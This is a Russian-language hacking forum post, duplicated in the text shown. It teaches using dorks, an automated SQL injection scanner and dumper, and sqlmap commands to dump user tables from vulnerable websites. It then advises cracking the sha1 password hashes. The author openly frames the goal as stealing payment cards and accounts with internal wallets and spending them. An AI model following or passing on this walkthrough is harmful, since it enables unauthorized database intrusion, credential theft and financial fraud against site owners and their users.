KeeperOffTheWar
Кидок
KeeperOffTheWar
Кидок
- 14 Окт 2015
- 188
- 130
Посмотреть вложение 29259
Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.
Затем произойдет магия сама по себе... [Broken External Image]:
Нажимаем на базе данных и нажимаем Get Tables
Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
Пошел слив
Идем дальше.
Посмотреть вложение 29260
Идем в командную строку и в раздел SQL Map
Вводим эту команду
sqlmap.py -u
Проявите немного терпения пока процесс закончится
Теперь, чтобы получить таблицы для той базы данных вводим эту команду
sqlmap.py -u
Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u
Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду
sqlmap.py -u
Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки python скрипт:
Затем нажимаем Enter и должен пойти поиск специфической директории
Все, пошел процес сканирования
Выглядит все сложно и сыро, понимаю [Broken External Image]:
Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их [Broken External Image]:
Всем удачи и экспериментов
Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.
Затем произойдет магия сама по себе... [Broken External Image]:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Нажимаем на базе данных и нажимаем Get Tables
Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
Пошел слив
Идем дальше.
Посмотреть вложение 29260
Идем в командную строку и в раздел SQL Map
Вводим эту команду
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbsПроявите немного терпения пока процесс закончится
Теперь, чтобы получить таблицы для той базы данных вводим эту команду
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 --tables
Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 -T tblusers --columns
Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbs -D chickenc_dbchicken2 -T tblusers --dump
Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки python скрипт:
Затем нажимаем Enter и должен пойти поиск специфической директории
Все, пошел процес сканирования
Выглядит все сложно и сыро, понимаю [Broken External Image]:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их [Broken External Image]:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Всем удачи и экспериментов